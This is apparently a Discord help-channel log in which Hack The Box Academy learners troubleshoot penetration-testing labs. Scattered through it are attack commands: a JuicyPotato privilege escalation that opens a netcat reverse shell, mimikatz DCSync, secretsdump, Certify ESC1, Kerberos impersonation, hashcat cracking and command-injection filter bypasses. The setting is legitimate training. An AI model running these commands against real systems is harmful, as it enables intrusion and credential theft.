#modules
why is it stored under debug?
because the compile settings defaults to debug, you can switch to release
I wouldn't recommend using dotnet to build on linux, it will likely work but it's iffy, build with visual studio would be the best
Yeh I just figured out why, that should have been the giveaway that it was single quote and not double
Thanks
Yeah windows doesn't like .exe compiled on non-windows systems
it's on my windows host powershell
Even if they're the exact same
I messed up windef is deleting it
Well... yeah... it's a hacking tool lmao
Just add that folder to exceptions in defender
also, make a dev vm to build tools
for popular tools they're most likely safe, but you never know what's in the projects
I'm seeing suggestions to use secretsdump on the AD Skills Assessment to get the tp***y username's cleartext credentials. I tried lsass.dmp and that did not give it in cleartext. It looked like secretsdump.py was to be used on a machine with python installed
How am I supposed to use secretsdump on this?
will do that
Even if I get a shell on the system instead of using rdp, I don't see how secretsdump.py would work since there's no python on the target machine.
I mean extracting the dmp and system save, should be trivial from there
you need a different tool for lsass
secretsdump indeed does not read lsass dumps, the right tool has been mentioned many times in the windows related modules
pypykatz hasn't given me anything from the lsass dumps
I have the answer since I used LaZagne, it just doesn't tie it to that user
I told you last time it came up. One of the great things with secretsdump is you can run it remotely
the target doesnt need python
you run secretsdump on your host
If you have the answer, but it doesn't tie to the user. Then you don't have the answer
It showed up under "default password" so I'm assuming there is an alternative method that shows the password tied to user
I'd do what madf0x suggests
default password is just a field for storing login creds
how do I do that?
secretsdump -h
Read the tool documentation
so far everything I've read is for dumping hashes
I've been told it's stored in plaintext and that I shouldn't have to dump hashes for this
It'll dump everything
including hashes and plaintext
As a wise man once said "reading the card, explains the card"
Hi
Ran this
I would like to start learning any suggestion on what programs I need on my computer to start learning on the website?
Got this
hi folks, having trouble with Kerberos Attacks module, lesson "Constrained Delegation from Linux". When I run the command "getST.py -spn TERMSRV/DC01 'INLANEFREIGHT.LOCAL/beth.richards:B3thR!ch@rd$' -impersonate Administrator" I get the error: "No such file or directory: './DC01$@INLANEFREIGHT.LOCAL_krbtgt@INLANEFREIGHT.LOCAL.ccache' ". Anyone can see what I'm missing?
A linux virtual machine and the will to read a bunch
I'm on the machine in rdp so I know my proxy is set up
How could I get that?
read the -h what's -just-dc flag for?
What do you mean?
have you set the right env variable to the ccache?
All I see now is
Introduction to Academy
I just wanna make sure everything will be ready so I won't face any issues tomorrow
If you've never touched a linux device before: there's a ton of fundamentals you'll need to learn
Aside from that there is the in-browser vm you can use
that was what i was thinking. But where am I supposed to get that env var? from the previous lesson or just from the example in this lesson?
I know that but basically It's my first time going into that stuff, I wanna learn.
Just take a second, take a step back, and just do it
if you're authenticating using creds then unset KRB5CCNAME
Do you mind telling me what's the first step I need to do?
I took out -just-dc
Since I don't have any experience with linux
Read the module and sections
I saw that as an option I had run before, so I tried it
The intro doesn't do anything crazy
Introduction to Academy
Yes
You mean to that?
Yeah I know it's nothing crazy yet but I just wanna make sure I will have all the programs I need to start learning
Ok, that worked, thank you! can you explain how and why please?
The only "programs" you need on your base computer are: a web browser, and a virtual machine software running linux
There's literally thousands of articles
The VM software there's any for free or I need to buy one
Idk how it works tbh
Virtualbox is free
you have a ccache set before, probably have deleted the file so impacket complains that it's missing even when you're authenticating using creds, just remember to unset it once you're done with it
Also a good portion of your questions can be googled
Do you mind to send me a link please?
gotcha, cheers!
Linux distributions?
Alright
Parrot and Kali are popular for pentesting
I don't see secretsdump.py remote operation covered in any of the modules. Is there a good resource for this?
It isn't working remotely
Oracle Linux 9 / Red Hat Enterprise Linux 9
Oracle Linux 8 / Red Hat Enterprise Linux 8
The newest one right? @fathom pendant
google. both of you
I wouldn't suggest redhat
just read setting up module lol
^
Ubuntu 22.04
There's literally a setting up module you can do after you get through the intro to academy
That goes over basic setup
It looks like secretsdump is covered for dcsync, but not for plaintext hashes
Alrighty, thanks!
Man I used Google and found an example command in like the first couple links
Literally only googling secretsdump remote
Can I DM you the command I used. I don't want to give spoilers for previous creds
I haven't done this yet
So no
I'm just stating, I used Google and found something
Keep getting the same thing:
I used impacket-secretsdump <username from question 2>:<pw from question 3>@172.16.6.50
If you have a proxychain setup, I'm assuming you're using that
👍
Thanks
Yeah my syntax worked, just had to do proxychains, haha.
I got the cleartext pw!
secretsdump is bae
netexec can do the same thing btw --sam --lsa but pretty sure it's the same thing beneath the hood
Or at the very least super similar
Rebuild the JAR file by following the same steps and log in again to the application. Then, navigate to FileBrowser -> Config, add the fatty-server.jar name in the input field, and click the Open button.
I like secretsdump formatting. But I haven't tried netexec's version in a hot minute so maybe they've done a formatting update since I last used cme for that task
anyone know how to get someone's ip address by email
afaik the format is the same, took a quick look at the code, they're calling the same dump() function
what google
????????????????????
search the same question you asked here, in google
Phishing and ip grabbing for the purposes of doxxing/and or hacking them is an illegal act, we won't be helping you
Hi all, I'm still stuck on the "injection attacks" skills assessment. I would be so grateful for any advice or hints. I can't seem to get the xpath injection working, nor can I work around the size issues with the iframe which crops the content I need. Please reach out if you are able to assist. Thanks in advance.
heyo i can help if you need
would anyone be willing to solve another conundrum please? I've done import-module powerview.ps1 (the script version that is on the host as per exercise), however it doesn't seem to have any functions (cmdlets). Why can that be?
sometimes it doesn't import correctly, try again, reset the machine or upload your own copy
did you change set execution policy?
Did you import it from the tools directory?
yep
Also some power view stuff relies on Active Directory, did you also import that?
You can just Import-Module ActiveDirectory from anywhere
I'll give that a go, thanks!
Nope, haven't thought of that, cheers!
That didn't work actually, couldn't find the module
yep, i guess I'll just reload the host
I know, right? Even when you list the available modules it shows the powerview and all but the version is 0.0 and has no commands shown
Yeah try resetting the target
this doesn't always work for newer windows server versions
what to do in that case? find the .ps1 of it?
It's worked every time for me on the windows lab environments
but sometimes windows labs are goofy ¯\_(ツ)_/¯
it should be in the OS by default for that lab
I was asking more for in the wild
#for non servers
Get-WindowsCapability -Name RSAT* -Online | Add-WindowsCapability -Online
#for servers >= 2012
Install-WindowsFeature RSAT-AD-PowerShell
#for servers < 2012
Import-Module ActiveDirectory
Second part of my statement
Great, I'll note that down, cheers!
the versions aren't always accurate, usually I'll just try all 3
I start with import then cry
@fathom pendant @next bronze Just a quick update: restarting of the target has indeed solved the goofy behaviour, thank you for your moral and spiritual support throughout this uneasy moment
go drunk, you're home
help me please. What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
well; are you logged into the domain controller?
if not: that's your first step
yes
one of the sections talks about searching windows event logs
I already did it and used this filter. Get-WinEvent -FilterHashtable @{Logname='Security'; ID=4625} -MaxEvents 50 | Format-List TimeCreated, Message
then just search the list, the timestamps are good to get an idea of breaks
literally read the log
also by DC i mean the 172.x.x.x server that was mentioned in an earlier question
oky thanks
how do i contact support? the updated section of this module is convoluted and after 3 days i'm still unable to proceed. got the rest of the module complete, just can't get past this damn fatty reversing
green bubble on the website
:) if you don't see it: you'll need to disable adblock
Hi guys, I'm currently trying to figure out why my hashcat is unable to crack the root password using the mutated_password list. I checked my unshadow file and it contains the hash. This is from Password Attacks, Passwd, Shadow & Opasswd.
are you using the right mode
└─$ hashcat -m 1800 -a 0 unshadowed.hashes ~/Downloads/Password-Attacks/mut_password.list -o unshadowed.cracked
yeah i sent a message to someone using that 3 hrs ago and it hasnt been seen
this is the same command from the section
also: since there's a handful of accounts there: it'll take a while
it was exhausted
try just putting the root hash into it's own file and run that on it's own
also try rockyou.txt
remember if one doesn't work, use another
With that I'm getting separator unmatched
are you copying the hash itself or the whole root:...:/bin/bash line
no, just the whole root...<snipped.>..bin/bash
1800 should be the right mode as it starts with $6$ i believe
copy the whole line, probably missed a : somewhere
Let me double check
Thanks @fathom pendant and @next bronze for catching my mistake 🙂
np; in this case since you only needed one of the hashes you can just kinda skip the rest
Hey guys,
In the Password Attacks submodule "Protected Files", where am I supposed to find this "cracked password of the user Kira"? The submodule seems to imply I've obtained this password in the past, but I looked through my notes and the previous submodules and came up short.
I found some note concerning the password "||LoveYou1||" and have tried a mutated list off that + hydra with no luck.
lowercase
but also yes: you should have had her password for the credential hunting portion
Awesome figured it out. Much thanks.
Could someone help me understand the breakdown of this hash? The module I'm doing asked me to paste in the NTLM hash of this user and I had to keep copying and guessing which portion of this was the correct answer, but I'd like to understand the different parts so I know for next time.
user:id:lm:nt
when you do PTH you're passing the NT hash
also it's still a spoiler as you're posting the answer
Sorry about that its been a late night should've been more careful
you can do * to indicate missing parts, i.e. kh*:1138:aa*:4b*:::
So if a question asks me for the NTLM hash I should be focusing on the NT portion is that correct?
those that have done the assignment can tell you; but anyway one of the earlier modules in the path (i believe Password attacks) breaks down the windows NTLMv2 hash
Yeah I remember it I just lost access to my obsidian notebook and didnt want to go through each module to try to find where that was
correct: the lm version is a significantly broken down version of the NT
Ok great thank you appreciate it
LM removes all uppercase
it's literally all lowercase and some special characters
NT has a wider range of characters
What if you wanted to pass this through hashcat, you'd do the NT portion?
generally you can pass the whole response to hashcat
as hashcat will likely attempt to crack the LM portion first: then use the LM crack to crack NT
Ah okay makes sense
it's only like a handful of hashes that hashcat doesn't like the full thing
but hashcat i believe looks for all parts of it
Awesome thanks a lot
sucks that you lost access to your notebook
did defender yeet your notes? ¯\_(ツ)_/¯
if so: adding the folder to exclusions prevents defender from scanning/deleting
My cat threw up on my laptop and fried something no clue what Im hoping just the battery but preparing for the worst. Waiting for an external SSD enclosure to arrive tomorrow from Amazon and hopefully the SSD is fine and I can access my data
if not: you can try and see if you can take it to a data recovery service
Yeah I'm hoping that won't be necessary I didn't find any moisture inside the laptop when I opened it up to take the battery out and SSD everything looks normal tbh just wont charge or turn on
how do I connect to the windows target?
might be crazy what i'm about to say: but pivoting
i implore you to read the section: i believe the section walks you through ALL the steps
You can use pretty much any of the file transfer methods that are outlined in the file transfer module, I used one of the most basic file transfer methods for this part if I remember correctly
YO One of us!~ I'm also 1 of the 8.
Your answer on how to send this to the windows machine is right in the image you posted
you're misunderstanding the issue
I am comfortable with transferring. what are the creds I need to log in to that windows machine
the issue they're stating: is that they cannot download the exe without being on the windows machine
Oh I see now what the question is my apologies
I need coffee clearly ☕
use a second ssh session to go from the ubuntu host to the windows host
That was a fun time
¯\_(ツ)_/¯
you can answer the question technically without doing the method
and tbh this is one of the more annoying setups
I did the quiz. I am trying to replicate the section
like there's a reason most of us that have used/understand it: use ligolo-ng
it takes a LOT of the tedium out of the more annoying stuff like this
the goal of this is to technically just have the second host communicate back to your system via a listener to create a shell session directly
instead of a -> b -> c you just have a proxy connection a <-> c
I'd have to go back for pivoting, but anything like sshuttle or proxychains or dynamic p-forwarding was nice. Networking theory is important here.
and then you find out about ligolo and proxychains looks like a chump lmao
ligolo works on a different network layer than proxychains
Ok now I'm going to have to go Google ligolo
Same
there's precompiled binaries for it
agent/proxy: proxy iirc is for YOUR system, agents are for the victims, the documentation clears it up
Thank the programming lords
Damn this tool looks great
there's 32 and 64 bit binaries for each OS
and Agent/Proxy for each OS
the man really said "fuck it we ball"
It looks so simple too I almost want to go back to the pivoting section and only use ligolo
Right?! We've been tormented.
the only mildly annoying thing is the double-pivots
Traumatizing^^
this tool didn't exist when they made the pivoting module
Tru
If I never have to double pivot again I'll be quite content lol
Cruel. How brutal
i mean the simple answer is just creating a new tun interface for every pivot hop you need to do
the dumber thing is
initiate a new session after it connects
close old connection, switch to new session, start
the older versions seem to have an autoswitch feature, which i'd like him to bring back
but now it just says "that interface is already in use"
:(
So you'd recommend ligolo-ng right just want to make sure I'm looking at the right one on GitHub
they were using the creds from the previous section. Probably should have mentioned there itself
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
Yeah I've made this mistake a bunch of times, I realized every time you see creds on a section just copy them to your notes lol makes life a lot easier
ok? still need a connection to pivot through :P
I understood the whole thing I was searching for creds like a madman lmao
LMAO
it helps if you provide context for why you're stuck brother
instead of us assuming you're failing to read
:^)
yep should have phrased it better
"I don't know how they want us to connect"
Uh... pivot?
I'm happy we misunderstood, wouldn't have learned about ligolo otherwise 😂
I still would have recommended ligolo anyway
:P you don't need to worry about proxychains and it being dumb
you can do all sorts of things with it
including: scanning a target with nmap without it yelling about ICMP requests being ignored
(though against windows targets, usually those get ignored anyway)
does ligolo support syn scans or do we need to enforce full TCP connect scans like for proxychains to not complain about partial data
i believe it supports syn scans
as i said earlier; it works on a completely different layer of the stack
Aye, agreed
Gamers I am back with the same XSS/XSS Attacks/Phishing module https://academy.hackthebox.com/module/103/section/984, I got the payload working, I tested it locally and I get the credentials with the form but whenever I try to send the url in the /phishing/send.php form the exercise says I get a Issue in sending URL! error, any ideas?
i mean if it's being flagged as phishing: then it's doing it's job
have you considered NOT doing something illegal and phishing?
:) what i was saying is; you're not gonna get help with illegal activities
not in this server
try asking google
FBI OPEN UP 🚓 
Fired them
out of the server
with a Canon?
With 🔨
anybody stuck on the part where you download the fatty server in Exploiting Web Vulnerabilities in Thick-Client Applications leave out return "Successfully saved the file to " + desktopPath;
}
Apparently it might be the IP in the payload? The page accepts the URL when I don't input my IP
Is anyone able to give me some pointers for the NoSQL injection skill assessment 2? I found the injection point, but I am not sure where to go from there.
Man I hate it here, my payload works but the url form is just wonky and I cant get through the question
And the pwnbox is extremely unstable, get me out of this module dude
Anybody having big issues rdp-ing into the target? I'm doing the shells live engagement module and I have been able to connect maybe twice in the last two days. Keep getting connection error and when it does connect it's slow as! Then disconnects
switch to the tcp connection
hey i have learnt the bare basics of hacking, how do i continue, is hack the box free version enough
i mean the labs site for free is good, if you wanna learn more: HTB-Academy is not free for content above tier 0
there is a pentesting path for their CPTS exam that goes through a lot of the minimum for testing a networked environment
Academy is very affordable if you just do it using cubes over time. Man I’ve learned so much from it. Definitely worth it.
Tried that unfortunately. No luck.
change vpn regions then?
Yeah done it all
¯\_(ツ)_/¯
Just thought maybe somethings down
I’m relatively new to it so not sure if that’s like a common iccurance
Ok cool. Maybe just a break is needed haha
it's not common, but it does usually happen when you're getting into it 
can someone help me? when i use this command ./socatx86.bin TCP-LISTEN:1234,fork TCP:X.X.X.X:1235 it gives me this error "./socatx86.bin: /lib/tls/i686/cmov/libc.so.6: version `GLIBC_2.15' not found (required by ./socatx86.bin)"
sounds like you need to compile socat statically
i tried to add at the end of command -static but doesn't work
you mean when you compiled it? or when you're running it
compiling and running are two different things
when i run it
compiling means that you are making the binary ready to use: not using it
how to make it
so did you download the binary precompiled?
i download the binary from github
then it's likely you downloaded one for an older version ¯\_(ツ)_/¯
the machine when i try to execute is older ubuntu
idk what version of socat should i download
i'm sure the section tells you how to do it
Can I verify with HTBacademy? #welcome redirects to OG HTB for identity verification so confused
either that or you're doing something unnecessary - socat may already be installed ¯\_(ツ)_/¯
you cannot verify with academy
unfortunately, you cannot verify with HTB Academy account
they are all separate platforms: for now
you will need to create an account on https://hackthebox.com/ if you don't have one already
Okay gotcha thanks
BTW is it only me whose pwnbox gets "minimized" everytime I switch the tab only to refresh to get it back to fullscreen?
nope
that's just a thing because the size is pulled from the interactive window on the page loaded
it's a pain
one way to not have to deal with that is setting up your own vm ¯\_(ツ)_/¯
ahhh..okay. I thought only THM had this issue but apparently both does.
it's just the nature of using a vnc
@fathom pendant is there any other way instead of socat because nothing works with socat
if i'm in a shell, instead of socat can i use another tool
pivoting module yeah?
for linux
that wasn't my question
ive complete this module but they show only socat for redirecting
you can pivot and redirect with most tools
i'd suggest learning ligolo-ng; it works way better
and isn't as dumb
i will try
attack n defense -> PKI - ESC1
Connect to the Kali host first, then RDP to WS001 as 'bob:Slavi123' and practice the techniques shown in this section. What is the flag value located at \\dc1\c$\scripts?
how to find out the IP Address of WS001 in order to RDP in at kali cmd?
For this module, they provided the IP Address to RDP into kali, which i have already RDP in.
the internal ips are listed in one of the first two sections where they talk about the lab environment
@fathom pendant i've exploited one machine and established a shell connection, after that i exploited a buffer overflow vulnerability on a third machine and established the connection from the third machine to the second with a netcat listener. my question is how can i use metasploit instead of a normal shell
after i background the session i lost the netcat connection
and instead i background the connection with second machine
okay thanks. works
you need to set up hops and listeners along your path, i haven't used metasploit for doing multiple pivots: nor do I know what module you're explicitly talking about, I don't recall any buffer overflow in the course
i give it as an example
i tried to use socat to redirect to multi/handler and then to use shell_to_meterpreter module in metasploit to upgrade to meterpreter shell but as i said the socat gives me errors and doesnt work
i don't have experience with socat or meterpreter/metasploit enough to be of help here dude ¯\_(ツ)_/¯
unfortunately I havent found any solution for this, guess I have to live with it.
attack n defense -> PKI - ESC1
they mention to run this command and get a cert.
.\Certify.exe request /ca:PKI.eagle.local\eagle-PKI-CA /template:UserCert /altname:Administrator
but i cant seem to find the cert.pem is located at.
am i suppose to save the text of the -------START CERTIFICATE ---- AND END CERTIFICATE into a text file n to the share folder?
Yes, it only prints the cert and you have to save it manually afterwards
i got this error. i have the cert.pem in my kali side.
Could not read private key from -in file from cert.pem
Means you copied it not completely, include the top line that starts with ——
i did include though.
did you run the command listed in the module afterwards to clean up the file?
do you mean this ?
sed -i 's/\s\s+/\n/g' cert.pem
yea
if it doesn't work just try redoing the steps, if you miss a single "-" or character somewhere it won't read correctly
help meeee please ^^"
Pivoting, Tunneling, and Port Forwarding
Dynamic Port Forwarding with SSH and SOCKS Tunneling
Hello I’m new here
You typed it wrong, not proxycchains
good morning 🙂
Hey
I just started HTB academy and somehow I can't start a new instance
Does anyone have any solution/
I'm currently in the tutorial section yet
interactive section with target
ACTIVE DIRECTORY ENUMERATION & ATTACKS
Enumerating & Retrieving Password Policies
1.What is the default Minimum password length when a new domain is created? (One number)
I dont get how to find it
shouldn't just give the answer, it can easily be googled
changed it
I initially thought I should use the tools provided in the module to find it. After searching on Google, I found the answer on the first page. Thank you very much.
give more info, what do you mean by that
PMs
just answer here
Hello. Does anyone give me some advice?
Module: Advanced XSS and CSRF Exploitation
Section: Skill Assessment
Question: I'm working on the exploit at the file upload page.
When I simulate it myself, it actually works well. But admin never access it (there is a mention that admin will access it).
Is this the intended behavior?
Basically I cannot open new instance on the website
I was trying to answer a question on the introduction
what instance? the target?
My Workstation
Free users are allowed 1 Pwnbox spawn per day. Get unlimited Pwnbox access by either subscribing for any plan or buying any amount of cubes in Academy's billing page, https://academy.hackthebox.com/billing
well that's exactly what it says, you have reached the limit of your pwnbox spawn for the day
So it means I cannot learn?
learn how to set up a vm and using vpn , you can evertime 🙂
Mind sending me a link for vm?
dude, we've answered that question earlier
google : parrot or kali in vm
^
you can still continue with the module content, just that you cannot start another pwnbox for the day
I haven't reached that yet
hacking is 90% troubleshooting and problem solving 🙂
hello I really got stuck at windows privilege escalation credentials hunting. Can someone please help?
I'm stuck on the part 1 of the windows privilege escalation skills assessment. I've managed to get a reverse shell but I can't exploit ||JuicyPotato|| as I get an error ||related to an invalid CLSID||. The command I'm running is
./JuicyPotato.exe -p c:\windows\system32\cmd.exe -l 6666 -a "/c c:\users\public\nc.exe <attack box IP> 8444 -e cmd.exe " -t *
Anyone have any hints on what I'm missing? I've tried ||printspoofer and RoguePotato|| and still get similar errors/no privileged shell.
found it
you may have to try different CLSIDs depending on Windows Version and whats running, you can provide a CLSID with the -c parameter
Check https://ohpe.it/juicy-potato/CLSID/ and see what applies to you
A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.
I found a valid CLSID but I don't get a reverse shell.
ok got the flag ... pita lol
ayo
I am kind of stuck with
last question of pass the hash
i am just not getting the rev shell on the nc
listener
the mod is password attacks
OK managed to find another valid CLSID which finally worked. Thanks for the link!
it may help when you can provide links
yea its a bit trial and error with juicypotato
https://academy.hackthebox.com/module/158/section/1439
is antivir on purpose ?
it always deletes my dll
nothing prevents you from stopping it
ok 🙂
thx i will look into it later 🙂
got it
Yeap and when I do it's kicking me out of the session every few minutes
icmp section ?
Yeah!
I'm on the part 2 of the windows privesc module assessment and my RDP session keeps disconnecting as well. Possibly a temporary platform issue?
I am doing skill assessment 1 from ad enumeration module. I uploaded the rubeus and mimikatz bin to the foothold but I am having trouble using them from a webshell or a rev shell any hints as to how to approach it?
the issue is that the tools make my connection time out so I have to regain the shell session
when I try to run the mimikatz script my shell gets stuck
Just after many resets and some patience it kinda worked enough for me to finish that section
mimikatz tries to run interactively, which doesn't work well with rev shells. You can start it like this to execute whatever command you want and then exit, which should hopefully not mess up your shell ./mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"
thanks will do that
Hey all
Question regarding Footpriting/IMAP.
I figured out all the flags, but I used the ||robin:robin|| credentials mentioned by others on the chat. I still don't understand how I was supposed to find these creds. Is it just by assuming that the ||robin|| SMTP user is also an IMAP user with a weak password?
always try user = password
and try every possible user , users like to reuse their password
its even worse in real pentests 😄
IMAP and smtp are both E-Mail related protocols, so it’s kind of safe to assume it’s the same credentials between the two
command injections: Bypassing Blacklisted Commands. tried different things to pass the cat filter.
${PATH:0:1} ${PATH:1:1} ${PATH:2:1}
c'a't
%63%61%74
But no catting so far, or i missed the flag.txt by wrong navigating. Anyone any nudges or hints?
Ok makes sense, thank you guys
Invoke-WebRequest -Uri http://10.10.15.107:8000/upload -Method POST -InFile "hashes.kerberoast" why is this powershell upload command not working?
I tried using the full path too. I double checked the file exists
Could be completely wrong but I’m not sure simplehttpserver supports file uploads like that, I would try transferring via other means or creating your own file receiving script using http.server
There is also an upload http server you can use with python and a PowerShell script to invoke a web upload
Netcat is always a good option
Appreciate it, will remove question and check out the channel 🙂
@snow ridge did you figure this out?
Yup
Check every parameter and test for blind
how to hack
girls ? computers ? toasters ?
just dont do it, hacking sucks and you just question life
if this is the regular python3 -m http.server - I don't recall it supporting file uploads/POST. use the upload module with python3 -m uploadserver, then you could send the file with invoke-fileupload
step 1: buy a hoodie
step 5 : drink "mate" tea , sorry it was misleading before
step 2: install kali
you or bill gates I dunno who's worse 
we all have hoodies @ work 🙂
got it thanks for the help
thought i tested every param, just didnt notice the blind
Guys do u have discord server for ine ctf challenge?
Is there any writeup on "Crafty"?
then why tf is this server created
bro im just goin thru it
its about modulo 😉
tf is modulo
how to learn legal hacking
have you made a htb academy account yet?
no
gonna just shamelessly plug this right here then: https://referral.hackthebox.com/mzwxkRC
youll want to make an account tho fr
htb academy has great beginner paths to hands on learning
i did
bro these tier 3 & 4 modules expensive lol
what are these questions
the right one seems to be a hacker
idk how
learn how to solve "problems"
I kerberoasted the account for the task "Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer " and got the ticket but how do I get the account name
how to understand the flag of an ip address
I would suggest watching Chris Greer's wireshark tutorial
yea
you need to pray to illuminati
they will handle the rest
yea neither is illuminati
but be careful
praying to illuminati comes with its own risks
dude I am serious
ask anyone here
oh no the eye
ok time for prayer
but no joke there seems to be an exploit for discord floating around ... not so funny
the illuminati or something more nefarious
yes
any help here plis
BH dump available ?
nope
seems i have some time 😉
Performing ping sweep for IP range xxx.xxx.xxx.xxx/16
@unique swift
Study the "C:\Rules\yara\shell_detector.yar" YARA rule that aims to detect "C:\Samples\MalwareAnalysis\shell.exe" inside process memory. Then, specify the appropriate hex values inside the "$sandbox" variable to ensure that the "Sandbox detected" message will also be detected. Enter the correct hex values as your answer. Answer format: Remove any spaces
Anyone?
What's your question?
my question is why is this not working?
did I do something wrong? the question was Submit the contents of the flag.txt file on the Administrator desktop on MS01
Hey
Wrong channel: #starting-point
thanks, i'll delete it from here
This channel is for academy modules, the starting-point boxes are machines
Is it possible to encode the payload in base64 in command injection module?
So far it only gave me errors, to be sure.
You'd need the payload to be decoded and executed
yes
Could you give me some advice for Bypassing Blacklisted Commands, command injection module. I'm stuck for a while now. I can execute system commands but I can't find the flag or ls other dirs than the current directory. What am I missing?
the section covers these methods
bypassing using other characters for example
I did try that and I can ls in the current dir, can route to another path but then I get no output. whoami and cat etc are filtered but I know how to pass that. I'm missing something but can't see what
i’m assuming the flag is in the root dir /?
Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found.
No 🙂 /home/1nj3c70r/flag.txt i would say
1nj3c70r was the username found in the question before
what a journey times 5
through the looking glass
*** -> *** -> *** was a bit slow 😉
but again learned a lot
next : Active Directory Enumeration & Attacks
glgl
Hi guys, took some time off from academy, could someone remind me where I can find the password when I want to ssh into the server as htb-student?
usually the password is given on the section
generally right above the first question
Don't really see one for the service scanning section
nmap module?
for a lot of the stuff, unless you need to ssh into the service to answer questions: you won't be provided creds
a lot of the NMAP stuff is definitely done strictly from the attack box
could be confusing sshing in with starting the vpn service on a VM
Yeah the nmap section, the last question is :
List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.
But I take it we don't need to ssh into the target to do this
smb is its own service so no
Ok thanks guys!
ah the user bob is given in the section
you get bob:{password}; read the section carefully
Oh I missed that, thanks 🙂
yep: reading is really helpful for a LOT of the modules
"cat" is filtered. not allowed
head, less and /bin/cat are filtered, tee shows only ping results (just like some cat functions do, no output, no error).
hm
have you tried using the path trick to construct the cat command
it works for constructing any word if you can find the right offsets, not just their given examples
Yes, and some cat variations do work (at least no invalid input error) but I don't get any output from the .txt file, ping results are shown so everything seems to work
are you 100% sure the name of the file and the path is correct ?
tried it with /etc/passwd ?
Hello, im doing medium lab in Footprinting module
Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer.
i got ** creds but i cannot use them on db, any suggest?
yes, see my screenshot.
hmmmm
I would expect an error or output from the text file, but when I don't get an invalid input error, it only shows the ping results.
i believe there's an important file, perhaps on a fileshare
in any case: running as admin solves a lot of problems
I've tried, but I don't have the admin pwd
yes it does
swear to god
I've done this some days ago and everything worked
i swear to whatever higher being helps you sleep at night
Can you exfiltrate the source code of the ping site you are using? That would allow you to see what exactly is filtered and work around it
AHAHHA
fun fact you can rdp with those creds if you swap the username for a built-in windows account
nvm, I'm just stupid, I've prob misclicked smth before
via source I can see it needs to consist of 4 octets, numbers only. The rest is done at the backend it seems.
tysm
oh cool thank you
as you go deeper into the path it gets way more "suspicious" 😉
and many "aha" moments
many facepalms
that was the word I wanted to say lol
of "oh... it works like that?..." after trying to overcomplicate the hell out of it
...
erm yes
let's not be fuckin weird
not my cup of tea 😄
htb is makin me yk
idk, nor do i think i wanna know
can we give this man the muted role of public shame??
Hey guys.
I made a share on my kali and now I use this command on target windows to access share but its not working:
copy \\10.10.15.54:4444\home\htb\aaa C:\
U have any idea why its not working?
any idea why ligolo is running on the server?
because you're fundamentally misunderstanding how it works
proxy is your host system: agent is the victims
yes agent is on the rev shell proxy is on my local
i guess i'm misunderstanding what you're asking
are you asking why it isn't running?
yea
that's a very different question lol
I am in the skill assessment in ad enum
So what's the problem
did you follow the documentation on chisel?
did you get windows amd64 agent?
my bad I forgot "not"
only other thing I can think of is maybe the port is simply not open
SMB can't arbitrarily choose a file location
you can try to run ligolo over a different port like 80/443/53/22
I am unpacking chisel now
you need to read the syntax for smb shares, your entire command was just wrong.
you tell SMB which file/directory you're sharing, you can't access the root of a fs from a share (unless you're hosting the smb share in the root directory)
I tried:
copy \\10.10.15.54:4444\home\htb-ac-519917\htb\aaa C:\Users\htb-student\Desktop
The problem is that when I used that command. I get:
"network path was not found"
I mean are you running SMB on port 4444 on your system?
Is it unzipped correctly?
but second: that's not how smb works
i mean; there's precompiled binaries my dude
Bro can anybody help, I did Netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=10.129.214.104 when working on Port Forwarding with Windows Netsh and my computer is completely broken. I am no longer to access the internet at all. And yes I checked internet options LAN settings and no there is no proxy server for my lan like every YouTube video says
yea I did download the windows binaries but it's missing the .exe extension
don't dm me without asking @raven lagoon
I was just following the module's commands
i doubt the module had you use that syntax
No it didn’t, but I had 4 hosts and since it wasn’t working at all and didn’t expect that command to destroy my computer
... that syntax is WILDLY different from what you're trying
you ran commands you didnt fully understand on your HOST 💀 ??
why were you using a VM???
smbserver [sharename] [options] [mountlocation]
I didn’t have a choice, all vm’s I downloaded were too slow and it could only allow a windows machine for the first few commands
the sharename is what's used for other devices using smb to connect to your share
"too slow" sounds like you didn't configure them properly
also the command should have been for a target windows, not to be run on your own instance
idk any module in the path that requires you to run your own windows system. if one is needed it gets provided for you
So how do I specify the sharename if this is the share command:
I tried
copy \\10.10.15.54:4444\share\aaa C:\Users\htb-student\Desktop
It didn’t for me. It just gave me Linux and it told me I had to do it
Do you know how to fix the issue or is computer completely fucked
then you severely misunderstood the instructions
what is aaa is that the file?
Yes
I did the entire course without ever touching my windows desktop. I used linux/mac laptops and never even needed a windows vm
then that should work, idk why you're needing to use a different port though?
Cause after making 1 share I started getting an error that the port is in use even after restarting the service
Well great. Thanks for the help for my broken computer
my second question: does that file exist in that file location?
Yeah it does
so if you do ls -la ~/htb the file aaa is there?
yeah
afaik there's no easy way to change the UNC port, just use the default 445 aka don't specify a port
try:
1.netsh int ip reset c:\resetlog.txt
2. ipconfig /flushdns
then restart the computer
Tried that before and just tried that again. It works for 2 mins then it does the same as usual
after a restart you get internet for two minutes then it stops?
Doesn't make much sense. You can try resetting the network adapter, otherwise I'd just opt for a reinstall.
Damn
Also on this module how in the world do you do the first two steps without using a windows host? academy.hackthebox.com/module/158/section/1435
you are given a windows host to rdp into
"after configuring the portproxy on our Windows-based pivot host*"
you misread the instructions
have you tried just deleting the v4tov4 stuff?
portproxy delete blah blah google the syntax
in the pwnbox there are 2 proxychains conf files: proxychains4.conf proxychains.conf which should I modify to use socks5?
Yeah I tried that, no luck. Think I may just have to reset everything on my pc
might as well
Thank you for the help though and pointing out where I screwed up lol. Really gonna read the directions carefully next time
it helps to focus on the high level conceptually what you're trying to achieve.
Even if you misread the directions, had you asked yourself 'how would this command help the goal of pivoting if I'm running it from my own host' you might've been able to stop yourself and checked your reading before it was too late
it pays to think critically about each and every command you run. You need to be prepared to supply the command and explain it to a client if nothing else
True true
Learned that lesson the hard way but still good to learn it regardless lol
if it makes you feel better you learned a bonus lesson on why people dont hack things from their host and use VMs lol
